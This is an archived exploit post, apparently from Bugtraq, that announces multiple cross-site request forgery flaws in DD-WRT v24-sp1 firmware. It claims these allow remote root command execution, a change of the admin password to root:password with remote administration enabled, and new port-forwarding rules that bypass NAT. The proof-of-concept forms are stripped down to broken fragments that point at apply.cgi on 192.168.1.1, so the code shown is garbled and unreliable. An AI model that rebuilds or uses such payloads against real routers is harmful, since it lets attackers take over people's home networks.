AOH :: HP Unsorted M :: VA2022.HTM

Multiple XSRF in DD-WRT (Remote Root Command Execution)



Multiple XSRF in DD-WRT (Remote Root Command Execution)
Multiple XSRF in DD-WRT (Remote Root Command Execution)



Author: Michael Brooks (!!!!)

I usually don't like posting my leet exploits to bugtraq because it is so unprofessional. You guys usually malform my exploits so they are totally useless,  even to someone trying to write a patch! You also tend to get the wrong name!  Michael Brooks wrote this!

Exploits tested on the newest stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:http://dd-wrt.com/ 

Impact:
1)Remote root command execution /bin/sh
2)Change web administration password and enable remote administration
3)create new Port Forwarding rules to bypass NAT.


       
               
       
       Remote root command execution /bin/sh
action="http://192.168.1.1/apply.cgi" id=1>


enable remote administration and change login to root:password
action="http://192.168.1.1/apply.cgi">


Change Port Forwarding to byass NAT protection.
action="http://192.168.1.1/apply.cgi">

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.